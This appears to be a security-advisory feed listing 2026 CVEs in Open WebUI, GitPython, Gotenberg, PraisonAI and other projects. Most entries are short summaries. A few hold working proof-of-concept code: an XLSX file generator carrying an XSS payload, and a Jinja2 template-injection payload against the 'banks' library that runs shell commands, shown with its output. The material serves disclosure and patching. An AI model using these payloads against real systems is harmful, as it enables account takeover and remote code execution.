<https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L110-L116> for the correct function to use. ```python def get_verified_user(user=Depends(get_current_user)): if user.role not in {"user", "admin"}: raise HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail=ERROR_MESSAGES.ACCESS_PROHIBITED, ) return user ``` Modify all authenticated endpoints to utilize `get_verified_user()` function instead of `get_current_user()`.

Authentication Bypass Python Debian
NVD GitHub
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-44549 PyPI HIGH PATCH GHSA This Week

### Summary Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the [sheetjs](https://git.sheetjs.com/sheetjs/sheetjs) function [sheet_to_html](https://git.sheetjs.com/sheetjs/sheetjs/src/commit/66cf8d2117d271f89e4f47b5fed35a3e1ea93f67/bits/79_html.js#L127) to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via [`@html`](https://svelte.dev/docs/svelte/@html) causing the payload to trigger. ### Details The function used to convert XLSX documents to HTML for preview does not perform any input validation or sanitisation for the generated HTML https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L120-L133 XLSX attachments are processed by this function, converted to HTML with `XLSX.utils.sheet_to_html` before ultimately being assigned to the variable `excelHtml`. Later there is logic that causes this to be assigned directly to the DOM when the preview tab is selected. https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L358-L400 ### PoC A python script to generate a payload file is as follows: ```python import xlsxwriter payload = '<img src=x onerror="alert(\'XSS Triggered by XLSX file\')">' workbook = xlsxwriter.Workbook('xss_payload.xlsx') worksheet = workbook.add_worksheet() payload_format = workbook.add_format() worksheet.write_rich_string('A1', 'This cell contains a hidden payload: ', payload_format, payload ) worksheet.write('A2', 'This is a safe cell.') worksheet.write('B1', 'Column B') workbook.close() ``` Upload the generated file as an attachment to a chat, open the file modal, and click preview. Observe the XSS triggers. <img width="2444" height="1386" alt="image" src="https://github.com/user-attachments/assets/8400efb0-ea6f-4878-abdb-4c2fe529241f" /> This same process can be triggered in shared chats, allowing the payload to be distributed to victims. <img width="2386" height="1646" alt="image" src="https://github.com/user-attachments/assets/d0eda49c-8fcf-4fc4-bbb0-c8951b0369c3" /> ### Impact Any user can create a weaponised chat that can be shared and subsequently used to target other users. Low privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server. Admins are at risk of exposing the server to RCE via same chain described in GHSA-w7xj-8fx7-wfch. ### Caveats The file attachment in the shared chat must be opened and previewed to trigger the vulnerability. ### Recommendation Sanitise the generated HTML with DOMPurify before assigning it to the DOM.

XSS Python
NVD GitHub VulDB
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-44987 LOW Monitor

SysReptor is a fully customizable pentest reporting platform. Prior to version 2026.29, users with "User Admin" permissions can change the email addresses of users with "Superuser" permissions. If the SysReptor installation has the "Forgot Password" functionality enabled (non-default), they can reset the Superusers' passwords and authenticate, if the Superuser has no MFA enabled. User managers can then access the Django backend (/admin) or manipulate the settings of the SysReptor installation. Note that user managers have the ability to access all pentest projects by assigning themselves "Project Admin" permissions. This is intentional and by design. This issue has been patched in version 2026.29.

Privilege Escalation Python
NVD GitHub
CVSS 3.1
3.8
EPSS
0.0%
CVE-2026-44209 PyPI HIGH PATCH GHSA This Week

## Summary `banks <= 2.4.1` uses `jinja2.Environment()` (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to `Prompt()` are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system. This is a vulnerability in how `banks` initializes its Jinja2 environment - not in Jinja2 itself. ## Vulnerable Code `src/banks/env.py` - the global Jinja2 environment is created without sandboxing: ```python env = Environment( autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False), ... ) ``` ## Attack Scenario An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to `Prompt()` is vulnerable. For example: ```python # User-controlled input reaches Prompt() user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" p = Prompt(user_input) p.text() # Executes arbitrary command on the host ``` ## Proof of Concept **Setup:** ```bash pip install banks==2.4.1 ``` **PoC script:** ```python from banks import Prompt payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" p = Prompt(payload) result = p.text() print(f"[+] Output: {result}") ``` **Confirmed output:** ``` [+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),... text **File-write proof:** ```python from banks import Prompt p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}") p.text() ``` ```bash ls -l /tmp/rce_banks_exec # -rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec ``` ## Impact Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise. ## Fix Fixed in `banks 2.4.2` (PR #74) by switching to `jinja2.sandbox.SandboxedEnvironment`, which blocks the dunder attribute traversal chain this exploit relies on. Developers on `banks <= 2.4.1` should upgrade to `2.4.2` and avoid passing untrusted user input as the template argument to `Prompt()`. ## Resources - Fix: https://github.com/masci/banks/pull/74 - CVE-2024-41950 (Haystack - identical root cause, CVSS 7.5) - CVE-2025-25362 (spacy-llm - identical root cause) - CWE-1336: Improper Neutralization of Special Elements in a Template Engine

Python RCE Ssti
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-44561 PyPI MEDIUM PATCH GHSA This Month

# Deactivated Channel Members Retain Full Access to Group/DM Channels ## Affected Component Channel membership authorization check: - `backend/open_webui/models/channels.py` (lines 663-673, `is_user_channel_member`) - Used at 15 locations in `backend/open_webui/routers/channels.py` ## Affected Versions Current main branch (commit `6fdd19bf1`) and likely all versions with the group/DM channel feature. ## Description The `is_user_channel_member` function checks whether a `ChannelMember` row exists but does not check the `is_active` field. When a user is deactivated from a group or DM channel (removed by the channel owner, or leaves voluntarily), their membership row persists with `is_active=False` and `status='left'`. Because the authorization check ignores this field, the deactivated user retains full read and write access to the channel via direct API calls. The channel correctly disappears from the deactivated user's channel list (the listing query at `get_channels_by_user_id` properly filters on `is_active`), but all 15 message-level endpoints in the router rely on `is_user_channel_member` for authorization, which does not filter on `is_active`. ```python # models/channels.py:663 - missing is_active check def is_user_channel_member(self, channel_id, user_id, db=None): membership = db.query(ChannelMember).filter( ChannelMember.channel_id == channel_id, ChannelMember.user_id == user_id, ).first() return membership is not None # True even when is_active=False ``` Compare with `get_channel_by_id_and_user_id` (line 778) which correctly checks `ChannelMember.is_active.is_(True)`. ## CVSS 3.1 Breakdown | Metric | Value | Rationale | |--------|-------|-----------| | Attack Vector | Network (N) | Exploited remotely via API calls | | Attack Complexity | Low (L) | No special conditions beyond knowing the channel ID (which the user had as a former member) | | Privileges Required | Low (L) | Requires a valid user account and prior channel membership | | User Interaction | None (N) | No victim interaction required | | Scope | Unchanged (U) | Impact is within the same authorization boundary (the channel) | | Confidentiality | Low (L) | Can read messages in a channel the user should no longer access | | Integrity | Low (L) | Can post, edit, and delete messages in the channel | | Availability | None (N) | No denial of service | ## Attack Scenario 1. User A and User B are members of a private group channel. 2. The channel owner removes User B (or User B leaves). User B's membership is set to `is_active=False, status='left'`. 3. The channel disappears from User B's UI - but User B noted the channel ID while they were a member. 4. User B calls the API directly: - `GET /api/v1/channels/{channel_id}/messages` - reads all messages, including those posted after deactivation - `POST /api/v1/channels/{channel_id}/messages/post` - posts new messages - `POST /api/v1/channels/{channel_id}/messages/{id}/update` - edits messages - `DELETE /api/v1/channels/{channel_id}/messages/{id}/delete` - deletes messages 5. All requests succeed because `is_user_channel_member` returns `True`. ## Impact - Deactivated users can continue reading all new messages posted after their removal (confidentiality breach) - Deactivated users can post, edit, and delete messages (integrity breach) - The deactivation mechanism provides a false sense of security - channel owners believe removed users have lost access ## Preconditions - Channels feature must be enabled (disabled by default) - Attacker must have a valid user account - Attacker must have been a member of the channel at some point (and thus knows the channel ID) ## Recommended Fix Add `is_active` filtering to `is_user_channel_member`: ```python def is_user_channel_member(self, channel_id, user_id, db=None): membership = db.query(ChannelMember).filter( ChannelMember.channel_id == channel_id, ChannelMember.user_id == user_id, ChannelMember.is_active.is_(True), ).first() return membership is not None ``` This aligns it with the existing `get_channel_by_id_and_user_id` method which already applies this filter correctly.

Authentication Bypass Python Denial Of Service
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-44564 PyPI MEDIUM PATCH GHSA This Month

Read-only users in Open WebUI can modify collaborative documents via Socket.IO by emitting crafted `ydoc:document:update` events that bypass write permission checks, allowing them to inject, modify, or delete content visible to all collaborators in real time. While direct database persistence requires write access, tampered content becomes permanent if any write-enabled user saves the document, undermining the read/write permission model for collaborative editing.

Authentication Bypass Python
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-44563 PyPI MEDIUM PATCH GHSA This Month

Open WebUI Ollama proxy endpoints bypass model access control checks, allowing authenticated users to access restricted models and expose sensitive configuration. Four endpoints (/api/generate, /api/embed, /api/embeddings, /api/show) fail to validate AccessGrants permissions before forwarding requests to the Ollama backend, despite the /api/chat endpoint implementing proper authorization checks. Attackers with any valid user account can consume GPU resources on restricted models and view sensitive details like system prompts by directly calling unprotected endpoints with known model names.

Authentication Bypass Python
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-44562 PyPI MEDIUM PATCH GHSA This Month

Open WebUI's POST /api/v1/models/import endpoint allows authenticated users with workspace.models_import permission to overwrite any existing model in the database without ownership validation, silently replacing system prompts, base model routing, and access grants. This enables a low-privilege user to hijack organization-wide models and inject malicious behavior affecting all downstream queries. The vulnerability bypasses access grant restrictions enforced on all other model mutation endpoints by never calling filter_allowed_access_grants.

Authentication Bypass Python Denial Of Service
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-44559 PyPI MEDIUM PATCH GHSA This Month

Open WebUI versions up to 0.8.12 allow authenticated users to enumerate members of private standard channels via the GET /api/v1/channels/{id}/members endpoint, which lacks access control checks present on other channel endpoints. An attacker who knows a private channel's UUID can retrieve the full list of members including their names, emails, roles, and profile images, enabling targeted social engineering and organizational structure reconnaissance. The vulnerability is fixed in version 0.9.0.

Authentication Bypass Python Denial Of Service
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-44557 PyPI MEDIUM PATCH GHSA This Month

Open WebUI versions up to 0.8.12 allow authenticated users to enumerate all knowledge bases across the instance via an incomplete access control allowlist in the retrieval collection validation function. The `_validate_collection_access` function only enforces ownership checks for collections matching `user-memory-*` and `file-*` patterns, allowing any authenticated user to directly query the system-level `knowledge-bases` meta-collection and retrieve the IDs, names, and descriptions of every knowledge base regardless of ownership. This information disclosure vulnerability serves as an enabler for subsequent attacks including knowledge base destruction and content injection, transforming these attacks from theoretically exploitable (requiring random UUID guessing) to trivially exploitable (UUIDs enumerable). CVSS score 4.3 (network-accessible, low privilege required, low confidentiality impact). Patched in version 0.9.0.

Python Denial Of Service Information Disclosure
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-44554 PyPI HIGH PATCH GHSA This Week

Open WebUI through version 0.8.12 allows authenticated attackers to destroy or poison any user's knowledge base via unauthorized collection overwrite operations. The `/api/v1/retrieval/process/web` endpoint fails to verify collection ownership before performing delete-and-replace operations on vector database collections. This enables attackers to permanently delete victim knowledge bases and inject malicious content that influences LLM responses through RAG poisoning. No public exploit identified at time of analysis, but proof-of-concept code is documented in the GitHub advisory GHSA-7r82-qhg4-6wvj. Vendor-released patch: version 0.9.0.

Authentication Bypass Python
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-44558 PyPI MEDIUM PATCH GHSA This Month

Open WebUI versions up to 0.8.12 allow authenticated users to bypass channel access control restrictions by directly persisting arbitrary access grants without applying the `filter_allowed_access_grants()` validation used consistently across other resource types. An attacker with channel creation or ownership privileges can grant public read access (via wildcard principal grants) or individual user access, circumventing admin-configured sharing permission policies. This affects installations where administrators restrict public sharing or user-grant capabilities to specific roles.

Authentication Bypass Python
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-44555 PyPI HIGH PATCH GHSA This Week

Authenticated users can bypass model access controls in Open WebUI ≤0.8.12 to invoke restricted AI models via chained base_model_id references. Any user with default model creation permissions can create a wrapper model referencing a restricted base model (e.g., gpt-4-turbo with admin-only access), then query it to consume the admin's API credits and access premium model capabilities. This vulnerability enables cost escalation on pay-per-token backends (OpenAI, Anthropic, Azure) and defeats tiered access policies. GitHub advisory confirmed; patched in version 0.9.0. No active exploitation confirmed per available intelligence, but the attack path is straightforward for authenticated users with standard permissions.

Authentication Bypass Python Microsoft
NVD GitHub
CVSS 3.1
7.6
EPSS
0.0%
CVE-2026-44552 PyPI HIGH PATCH GHSA This Week

Cross-instance cache poisoning in Open WebUI allows administrators on one instance to inject malicious tool server configurations into shared Redis cache, affecting users on other instances. The vulnerability stems from missing Redis key prefixes on tool_servers and terminal_servers cache entries in backend/open_webui/utils/tools.py. When multiple Open WebUI instances share a Redis backend (a documented multi-region/blue-green deployment pattern), an admin on Instance A can configure a malicious tool server that overwrites Instance B's cache, causing Instance B users to send tool call payloads-containing chat content, user identity, and OAuth tokens-to attacker-controlled servers. Exploitation requires privileged access (CVSS PR:H) but crosses instance boundaries (Scope:Changed), enabling data exfiltration and prompt injection delivery. Vendor-released patch: version 0.9.0 addresses the missing prefix issue.

Redis Python Information Disclosure
NVD GitHub
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-44553 PyPI HIGH PATCH GHSA This Week

Privilege escalation in Open WebUI ≤0.8.12 allows demoted administrators to retain elevated access to collaborative documents via stale Socket.IO sessions. When an admin user is demoted or deleted, their active WebSocket connection preserves cached admin privileges indefinitely through heartbeat mechanisms, enabling unauthorized read/write access to any user's notes. Official patch released in version 0.9.0 addresses the session invalidation gap. CVSS 8.1 (High) with network attack vector and low complexity; no public exploit identified at time of analysis.

Authentication Bypass Python Session Fixation
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-44550 PyPI MEDIUM PATCH GHSA This Month

Mass assignment vulnerability in Open WebUI's folder creation endpoint allows authenticated attackers to create folders in other users' accounts by exploiting Pydantic's extra='allow' configuration. An attacker with a valid account can supply an arbitrary user_id in the POST request body, overwriting the server-assigned value and persisting folders under a victim's account without their knowledge. The attacker can use this to plant phishing content, spam folders, or degrade user experience for targeted victims.

Authentication Bypass Python
NVD GitHub
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-44551 PyPI CRITICAL POC PATCH GHSA Act Now

Remote authentication bypass in Open WebUI LDAP integration (versions ≤0.8.12) allows complete account takeover by submitting empty passwords. The vulnerability exploits RFC 4513 unauthenticated simple bind semantics: when LDAP is enabled, attackers can authenticate as any user-including administrators-with zero knowledge of actual passwords, gaining full access to chats, files, API keys, and settings. Affects deployments using OpenLDAP default configurations or certain Active Directory setups that accept empty-password binds. Vendor-released patch: version 0.9.0. CVSS 9.1 (Critical) reflects network-accessible, zero-privilege, zero-interaction exploitation with high confidentiality and integrity impact.

Authentication Bypass Python Denial Of Service
NVD GitHub
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-44502 PyPI MEDIUM PATCH GHSA This Month

Bugsink versions 2.1.2 and earlier contain a webhook URL validation bypass (SSRF) where malformed URLs with backslashes and @ symbols pass validation checks but are interpreted differently by Python's urllib parser versus the requests HTTP client, allowing attackers with webhook configuration access to direct outbound POST requests to blocked hosts including loopback and private addresses. The vulnerability is narrower than full SSRF because requests do not follow redirects, the request shape is constrained by URL normalization, and this only affects webhook integrations, not arbitrary outbound proxying.

Python SSRF
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-44588 Go CRITICAL PATCH GHSA Act Now

Remote code execution in SiYuan's Electron renderer occurs when users hover over search results, file tree items, or attribute view elements containing URL-encoded XSS payloads in document titles or metadata. The vulnerability chains a URL-decoding step (decodeURIComponent) with unsafe innerHTML assignment in tooltip rendering, bypassing the escapeAriaLabel sanitizer that only handles HTML entities but ignores %XX URL escapes. Because SiYuan's renderer runs with nodeIntegration:true and contextIsolation:false, the XSS escalates to arbitrary code execution via require('child_process'). Exploitation requires user interaction (hovering) but no authentication, and malicious payloads survive .sy.zip export/import and sync replication, enabling supply-chain and shared-workspace attacks. No public exploit code identified at time of analysis, though detailed proof-of-concept is published in the GitHub advisory.

Microsoft XSS Python RCE Apple +2
NVD GitHub VulDB
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-44721 LIB HIGH PATCH GHSA This Week

Stored cross-site scripting in Open WebUI versions 0.3.5 through 0.8.12 allows authenticated users with model creation permission to inject malicious JavaScript via markdown-link payloads in model descriptions. Attackers craft markdown links with javascript: URIs (e.g., [text](javascript:alert())) that bypass sanitization, are parsed into executable anchor tags by marked.parse(), and rendered unsafely via Svelte's {@html} directive. Successful exploitation enables session token theft from localStorage and full account takeover of admins and other users who view the malicious model in the chat UI. This represents a pipeline-ordering flaw distinct from CVE-2024-7990, which exploited a video-tag restoration logic removed in v0.4.0. Fix confirmed in v0.9.0 (commit 5eab125) via DOMPurify post-processing. EPSS data not provided; CVSS 7.3 reflects network attack vector with low complexity but required authentication and user interaction, limiting automated exploitation.

XSS RCE Python
NVD GitHub VulDB
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-44338 PyPI HIGH POC PATCH NEWS GHSA This Week

Remote unauthenticated access to PraisonAI's legacy Flask API server allows attackers to execute configured agent workflows without authentication. Versions 2.5.6 through 4.6.33 ship with authentication disabled by default on the Flask server, enabling any network-accessible caller to trigger agents.yaml workflows via the /chat endpoint and access agent configurations through /agents. Patch released in version 4.6.34. CVSS 7.3 with network vector and no privileges required (AV:N/AC:L/PR:N/UI:N) indicates this is remotely exploitable against default configurations, though impact is limited to low confidentiality, integrity, and availability (C:L/I:L/A:L).

Authentication Bypass Python
NVD GitHub
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-44336 PyPI CRITICAL PATCH GHSA Act Now

Arbitrary file write in PraisonAI's MCP server escalates to remote code execution through path traversal when user interaction triggers malicious tool calls. The praisonai mcp serve daemon accepts attacker-controlled path arguments without validation, allowing writes outside the intended ~/.praison/rules/ directory. Attackers can drop Python .pth files into site-packages to achieve code execution in any subsequent Python process run by the victim user. CVSS 9.4 with network vector and low complexity, though exploitation requires user interaction (PR:N/UI:P). No active exploitation confirmed (not in CISA KEV) and no public POC identified at time of analysis, but the detailed advisory provides sufficient information for weaponization.

Python RCE
NVD GitHub
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-41497 PyPI CRITICAL PATCH GHSA Act Now

Command injection in PraisonAI's MCP server command handler enables remote unauthenticated attackers to execute arbitrary operating system commands. The vulnerability exists in parse_mcp_command() which accepts MCP server commands without validating executables or arguments, allowing injection of shell commands like 'bash -c', 'python -c', or '/bin/sh -c' with inline code execution. GitHub security advisory GHSA-9qhq-v63v-fv3j confirms this is an incomplete fix for CVE-2026-34935. Vendor-released patch version 4.6.9 (upstream version 1.5.69) implements an allowlist of permitted MCP executables and validates commands against ALLOWED_MCP_COMMANDS. No active exploitation confirmed (not in CISA KEV); proof-of-concept exploit code published in advisory demonstrates trivial exploitation.

Python Command Injection RCE
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-44641 PyPI HIGH PATCH GHSA This Week

Path traversal in Microsoft APM CLI 0.8.11 and earlier allows malicious plugins to copy arbitrary readable host files into managed project directories during installation. The plugin_parser.py module fails to validate that component paths in plugin.json manifest fields (agents, skills, commands, hooks) remain within the plugin root, enabling attackers to use absolute paths or ../ traversal sequences to exfiltrate local files. Verified proof-of-concept demonstrates a malicious plugin copying external markdown files into .github/prompts/ through the auto-integration pipeline. Exploitation requires user interaction (installing a malicious plugin), but no authentication is required once the user initiates installation. CVSS 7.1 (High) reflects significant confidentiality and integrity impact in a local supply-chain attack scenario. Vendor-released patch available in apm-cli 0.8.12 per GitHub advisory GHSA-xhrw-5qxx-jpwr. No active exploitation (CISA KEV) confirmed, but publicly available exploit code exists with complete proof-of-concept including runnable scripts.

Python Microsoft Path Traversal
NVD GitHub
CVSS 3.1
7.1
EPSS
0.1%
CVE-2026-44523 Go CRITICAL PATCH GHSA Act Now

JWT secret validation bypass in Note Mark allows full account takeover through offline token forgery. The Go-based note-taking application accepts HS256 signing secrets shorter than RFC 7518's required 32 bytes, enabling attackers to capture a single valid JWT from network traffic or logs, brute-force the weak secret offline, and forge authentication tokens for any user including administrators. Publicly available exploit code exists (vendor-published PoC in GitHub advisory GHSA-q6mh-rqwh-g786). Vendor-released patch available in commit 18b587758667 and release v0.19.4. CVSS 10.0 reflects unauthenticated network exploitation with scope change, though real-world impact requires JWT capture as a prerequisite.

Python RCE
NVD GitHub
CVSS 3.1
10.0
EPSS
0.0%
CVE-2026-27892 PHP MEDIUM GHSA This Month

FacturaScripts fails to strip EXIF and metadata from user-uploaded images in the Library module, allowing any authenticated user with download access to extract GPS coordinates, device information, timestamps, author names, and other personally identifiable information from downloaded files. An employee uploading a photo taken at their home inadvertently discloses their precise home address to all users with Library access. This affects all image uploads retroactively, with no patched version currently available.

Microsoft PHP File Upload Python Apple +2
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-42284 PyPI HIGH PATCH GHSA This Week

Remote code execution in GitPython < 3.1.47 allows unauthenticated network attackers to inject malicious Git configuration during repository clone operations via crafted multi_options arguments. The _clone() method validates options before shlex.split transformation, enabling attackers to bypass unsafe option checks by embedding commands like '--config core.hooksPath=/attacker/path' within '--branch' strings. Git then executes attacker-controlled hooks during clone. Vendor-released patch available in version 3.1.47. CVSS 8.1 with high attack complexity; no EPSS or KEV data available, but public exploit code exists per GitHub security advisory GHSA-x2qx-6953-8485.

Python Information Disclosure Suse
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-42215 PyPI HIGH POC PATCH GHSA This Week

Command injection in GitPython 3.1.30-3.1.46 allows remote authenticated attackers to execute arbitrary commands via underscore-formatted kwargs that bypass unsafe option validation. Applications passing attacker-controlled kwargs to Repo.clone_from(), Remote.fetch(), Remote.pull(), or Remote.push() are vulnerable even when allow_unsafe_options=False (default). GitHub-confirmed exploit with vendor-released patch 3.1.47. CVSS 8.8 reflects network vector with low complexity and authenticated access; no EPSS/KEV data indicates exploitation not yet widespread beyond proof-of-concept demonstration.

Python Command Injection Suse
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-40610 PyPI MEDIUM PATCH GHSA This Month

BentoML's `bentoml build` command dereferences symlinks within the build context and copies their target file contents into the generated Bento artifact, allowing attackers to exfiltrate sensitive files from the build host. An attacker who controls a repository or build context can place symlinks pointing to sensitive local files (credentials, SSH keys, API tokens), and when a developer or CI system runs `bentoml build`, the referenced file contents are packaged into the Bento, which may then be exported, pushed, or containerized, spreading the leaked data. Publicly available exploit code demonstrates successful extraction of files outside the build directory. Affected versions through BentoML 1.4.38; patch released in 1.4.39.

Python Path Traversal
NVD GitHub
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-33587 CRITICAL Act Now

Server-Side Template Injection in Open Notebook v1.8.3 enables arbitrary Python code execution and OS command execution within the Docker container through unsanitized user input in transformation features. The vulnerability requires local access (CVSS AV:L) but no authentication or user interaction, making it exploitable by any application user with access to the transformation creation interface. No public exploit code identified at time of analysis, though the GitHub security advisory provides technical details for reproduction.

Python Docker Code Injection
NVD GitHub VulDB
CVSS 4.0
9.2
EPSS
0.0%
CVE-2026-44504 PyPI HIGH PATCH GHSA This Week

Cross-tenant Insecure Direct Object Reference (IDOR) in Aegra 0.9.0-0.9.6 allows any authenticated user to execute graph runs against other users' threads, exfiltrate full checkpoint state including conversation histories, and inject malicious messages into victims' threads by supplying known thread UUIDs to POST /threads/{thread_id}/runs endpoints. Thread IDs leak through frontend URLs, server logs, and observability traces, eliminating need for enumeration. Vendor-released patch (v0.9.7) confirmed by GitHub advisory GHSA-m98r-6667-4wq7. No active exploitation or POC identified at time of analysis, though detailed reproducer exists in issue #336.

Authentication Bypass Checkpoint Python
NVD GitHub VulDB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-44503 LIB HIGH PATCH GHSA MAL This Week

Cross-host HTTP redirects in Microsoft Kiota HTTP client libraries leak session cookies, proxy credentials, and custom authentication headers to attacker-controlled domains. When Kiota's RedirectHandler middleware follows 3xx redirects to different hosts (e.g., trusted.example.com → evil.attacker.com), it strips the Authorization header but forwards Cookie, Proxy-Authorization, and all custom headers unchanged. Publicly available exploit code exists with a complete proof-of-concept demonstrating cookie exfiltration to malicious redirect targets. This affects all Kiota language implementations (Java, .NET, Python, TypeScript, Go) and downstream consumers including Microsoft Graph SDK for Java. The vulnerability requires user interaction to trigger the initial API request, but once triggered, credential leakage is automatic on cross-origin redirects (CVSS:4.0 AV:N/AC:L/AT:P/PR:N/UI:P). Vendor-released patches are available across all affected package ecosystems.

Python Microsoft Java Open Redirect
NVD GitHub
CVSS 4.0
7.0
EPSS
0.1%
CVE-2026-42597 Go MEDIUM PATCH GHSA This Month

Gotenberg versions 8.31.0 and earlier allow unauthenticated remote attackers to enumerate and read arbitrary files under /tmp/ via the /forms/chromium/convert/url and /forms/chromium/screenshot/url endpoints using file:// scheme URLs. An attacker can discover in-flight conversion request directories and exfiltrate source files (HTML, Markdown, Office documents, staged PDFs) from other users' concurrent conversion requests by timing attacks to coincide with long-running conversion operations. The vulnerability exploits a logic flaw where the URL routes fail to set per-request scope guards that HTML/Markdown routes correctly apply, causing file:// access control enforcement to silently skip for URL-based conversions.

Microsoft Python RCE Docker Google
NVD GitHub
CVSS 3.1
5.9
EPSS
0.0%
CVE-2026-42596 Go CRITICAL PATCH GHSA Act Now

Unauthenticated server-side request forgery (SSRF) in Gotenberg 8.30.1 and earlier allows remote attackers to force the server to make HTTP requests to internal/loopback addresses by bypassing default deny-lists with IPv4-mapped IPv6 notation (e.g., http://[::ffff:127.0.0.1]:port). The vulnerability affects both the downloadFrom file-fetching feature and the webhook delivery feature. Attackers can read content from internal HTTP endpoints and trigger state-changing requests against services bound to localhost, exposing internal APIs, cloud metadata endpoints, and admin interfaces. Fix available in version 8.32.0. No public exploit code confirmed outside the GitHub advisory PoC, not listed in CISA KEV, but CVSS 9.4 Critical rating reflects the network-accessible, unauthenticated nature and high confidentiality/integrity impact.

SSRF Microsoft Python Docker Google
NVD GitHub VulDB
CVSS 3.1
9.4
EPSS
0.1%
CVE-2026-42594 Go HIGH PATCH GHSA This Week

Unauthenticated remote attackers crash Gotenberg 8.x (≤ 8.31.0) by triggering a race condition between webhook goroutine context reuse and Echo framework connection pooling. When webhook middleware spawns an async goroutine holding an `echo.Context` reference, the synchronous handler returns immediately, recycling the context to Echo's `sync.Pool`. Concurrent requests reset the pooled context, causing unchecked type assertions in the still-running webhook goroutine to panic outside any `recover()` scope, terminating the process with exit code 2. Twenty-four webhook requests plus sixty concurrent GET requests demonstrate reliable two-second crash windows. No patch was available at initial disclosure; upstream commit fixes the panic in version 8.32.0. CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) reflects trivial unauthenticated network exploitation producing complete service disruption.

Kubernetes Denial Of Service Python Race Condition Docker +1
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-42593 Go MEDIUM PATCH GHSA This Month

Arbitrary PDF file read vulnerability in Gotenberg versions up to 8.31.0 allows unauthenticated remote attackers to extract PDF content via path traversal in stampExpression and watermarkExpression parameters on six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown). The vulnerability exists because these routes accept user-controlled file paths without validation when stamp or watermark source is set to PDF, unlike the dedicated stamp/watermark routes which enforce file upload requirements. An attacker can read any PDF accessible to the Gotenberg process by specifying its filesystem path, gaining access to potentially sensitive documents in containerized deployments or systems with mounted directories.

Microsoft Python Oracle Docker Google +1
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-42592 Go MEDIUM PATCH GHSA This Month

DNS rebinding vulnerability in Gotenberg allows unauthenticated remote attackers to bypass SSRF protections and access internal services via Chromium URL conversion routes. When a URL is submitted for PDF conversion, Gotenberg validates the resolved IP address against a deny-list but discards the pinned result. Chromium then performs independent DNS resolution multiple times, creating a race condition where an attacker controlling DNS can return a public IP during validation and a private IP during connection, allowing access to loopback services, cloud metadata endpoints, or internal networks. Exploitation succeeds approximately 10% per attempt with trivial automation.

Python Docker Information Disclosure Google
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-42589 Go CRITICAL POC PATCH GHSA Act Now

Unauthenticated remote code execution in Gotenberg 8.29.1 allows network attackers to execute arbitrary OS commands via newline injection in PDF metadata keys. The `/forms/pdfengines/metadata/write` endpoint passes user-controlled JSON metadata keys directly to ExifTool without control-character validation. Embedding `\n` in a key splits ExifTool's stdin stream, injecting arbitrary flags including `-if` which evaluates Perl expressions. Attack returns HTTP 200 with valid PDF output, evading basic monitoring. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) reflects critical network-accessible RCE. No vendor-released patch identified at time of analysis — GitHub advisory GHSA-rqgh-gxv4-6657 confirms the issue but CPE data shows no fixed version. Publicly available exploit code exists in Python and bash with OOB exfiltration. Default Docker image `gotenberg/gotenberg:8` runs the vulnerable process as uid 1001 with root group membership, amplifying post-exploitation impact.

Command Injection Python RCE Docker Google
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
